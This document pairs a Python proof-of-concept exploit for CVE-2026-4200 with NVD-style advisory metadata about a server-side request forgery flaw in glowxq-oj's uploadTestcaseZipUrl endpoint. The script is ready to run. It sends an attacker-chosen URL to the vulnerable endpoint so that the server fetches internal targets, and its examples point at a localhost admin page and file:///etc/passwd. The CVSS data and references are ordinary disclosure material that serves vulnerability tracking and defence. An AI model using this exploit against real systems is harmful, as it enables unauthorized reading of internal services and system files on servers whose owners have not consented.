CVE-2026-4200

import requests import sys # CVE-2026-4200 SSRF PoC for glowxq-oj # Target: glowxq-oj ProblemCaseController uploadTestcaseZipUrl function def exploit_ssrf(target_url, internal_target): """ Exploit SSRF vulnerability in uploadTestcaseZipUrl function Args: target_url: Base URL of vulnerable glowxq-oj instance internal_target: Internal resource to target (e.g., http://127.0.0.1:8888, file:///etc/passwd) Returns: Response from the internal target """ endpoint = f"{target_url}/api/problem/case/upload-testcase-zip-url" # Construct malicious payload payload = { 'url': internal_target, 'problemId': '1' } try: response = requests.post(endpoint, json=payload, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2026-4200_poc.py <target_url> <internal_target>") print("Example: python cve-2026-4200_poc.py http://vulnerable-host:8080 http://127.0.0.1:8888/admin") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] print(f"[*] Targeting: {target}") print(f"[*] Internal target: {internal}") print("[*] Sending malicious request...") result = exploit_ssrf(target, internal) print(f"[+] Response:\n{result}")

{"cve": {"id": "CVE-2026-4200", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:04.847", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in glowxq glowxq-oj up to 6f7c723090472057252040fd2bbbdaa1b5ed2393. This affects the function uploadTestcaseZipUrl of the file business/business-oj/src/main/java/com/glowxq/oj/problem/controller/ProblemCaseController.java. Performing a manipulation results in server-side request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad de seguridad en glowxq glowxq-oj hasta 6f7c723090472057252040fd2bbbdaa1b5ed2393. Esto afecta a la función uploadTestcaseZipUrl del archivo business/business-oj/src/main/java/com/glowxq/oj/problem/controller/ProblemCaseController.java. Realizar una manipulación resulta en falsificación de petición del lado del servidor. El ataque puede iniciarse de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques. Este producto utiliza entrega continua con lanzamientos continuos. Por lo tanto, no se dispone de detalles de versión de las versiones afectadas ni actualizadas. El proveedor fue contactado con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://fx4tqqfvdw4.feishu.cn/docx/K0SjdZTPRo31LExSdlfcC3jwn1c?from=from_copylink", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351112", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351112", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770476", "source": "[email protected]"}]}}